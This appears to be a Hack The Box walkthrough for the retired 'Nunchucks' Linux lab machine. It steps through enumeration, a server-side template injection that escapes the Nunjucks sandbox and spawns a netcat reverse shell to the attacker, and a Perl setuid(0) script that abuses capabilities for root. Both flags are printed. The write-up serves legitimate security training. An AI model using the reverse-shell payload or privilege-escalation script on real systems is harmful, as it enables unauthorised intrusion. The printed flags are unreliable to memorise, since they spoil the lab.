Name: | Nunchucks |
---|---|
Release Date: | 28 Oct 2021 |
Retire Date: | 02 Nov 2021 |
OS: | Linux |
Base Points: | Easy - Retired [0] |
Rated Difficulty: | |
Radar Graph: | |
HTB-Bot 00 days, 02 hours, 00 mins, 00 seconds | |
HTB-Bot 00 days, 02 hours, 00 mins, 00 seconds | |
Creator: | TheCyberGeek |
Pentest Workshop PDF: | Nunchucks.pdf |
Again, we start with sudo /home/kali/AutoRecon/src/autorecon/autorecon.py 10.10.11.122
Sidenote: Newer versions of Kali that do not use root by default require sudo whenever checking UDP ports.
We have ports SSH TCP 22, HTTP TCP 80, and HTTPS TCP 443 to deal with. Navigating to http://10.10.11.122 is "Unable to Connect". Navigating to https://10.10.11.122 pulls up a sales page. Looking at the autorecon output for TCP 80, we see that there's a statement "Did not follow the redirect to http://nunchucks.htb. This means we need to add it to /etc/hosts using:
vi /etc/hosts
10.10.11.122 nunchucks.htb
<ESC>:wq!<RETURN>
Notice, the domain name redirects to HTTPS and shows us the exact same page. Fire up GoBuster and check a look at results:
gobuster vhost -u https://nunchucks.htb -k -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t50 -o nunchucks.out
┌──(kali㉿kali)-[~/Desktop/HTB/Nunchucks]
└─$ gobuster vhost -u https://nunchucks.htb -k -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t50 -o nunchucks.out
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://nunchucks.htb
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/01/22 02:36:56 Starting gobuster in VHOST enumeration mode
===============================================================
Found: store.nunchucks.htb (Status: 200) [Size: 4029]
Found: Store.nunchucks.htb (Status: 200) [Size: 4029]
===============================================================
2022/01/22 03:21:09 Finished
===============================================================
Notice that we used "vhost" instead of "dir" in the Gobuster command. Dir will find directories, vhost finds sub-domains. We found the "store".nunchucks.htb sub-domain. We will need to add the sub-domain to our /etc/hosts file the same way we did above for nunchucks.htb.
There's no store yet, but a method to sign up for a newsletter. Depending on input validation on this site (and a myriad of other things), we can try different Web App Attack methods. One of those methods is an Server-Side Template Injection (SSTI) attack. To check for this type of attack, we need to input something that uses 7 * 7 = 49 in it. For more SSTI detection methods, check out HackTricks here. Our email address to enter should be {{7*7}}@nunchicks.htb and then capture the response in Burpsuite to confirm the SSTI. In this particular case, we don't "need" to use Burpsuite because the response shows the email address on the page itself to be 49@nunchucks.htb, but it's good practice to use Burp in case the address doesn't show on the response page.
Since we did get the "49" response, we have confirmed that the site is vulnerable to SSTI attacks. As simple Google search for Nunchucks Template Injection provides us with a "payload" to escape the sandboxing by using "range.constructor". With that, we can build an injection to make a reverse shell to out netcat listener:
On Attacking Machine:
nc -lvnp 1337
Send the POST to /api/submit to Repeater:
{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR TUN0 IP> 1337 >/tmp/f')\")()}}
We have a foothold as david. We can upgrade our shell to TTY using:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Grab the user.txt flag and begin our privesc enumeration (LinPEAS and/or LinEnum).
david@nunchucks:~$ cat user.txt
cat user.txt
891029b0bd7f13f2731b075bdaabf354
LinEnum shows POSIX/SETUID capabilities on /usr/bin/perl. This is another GTFOBins box. I love GTFOBins. They are so fun to play with.
All we need to do is create a simple Perl script that bypasses AppArmor (annoying thing that it is) and we should have a shell as root.
#!/usr/bin/perl
use POSIX qw(setuid);
POSIX::setuid(0);
exec "/bin/bash";
I like to create the script on my Attacking box and wget'ting it to the Victim machine. Vim tends to work very weird on reverse shells.
root@nunchucks:~# cat /root/root.txt
cat /root/root.txt
165be6ba57e60d1450789a97d473bf15
With that, we are root! Grab the flag and we've completed another box! Congrats!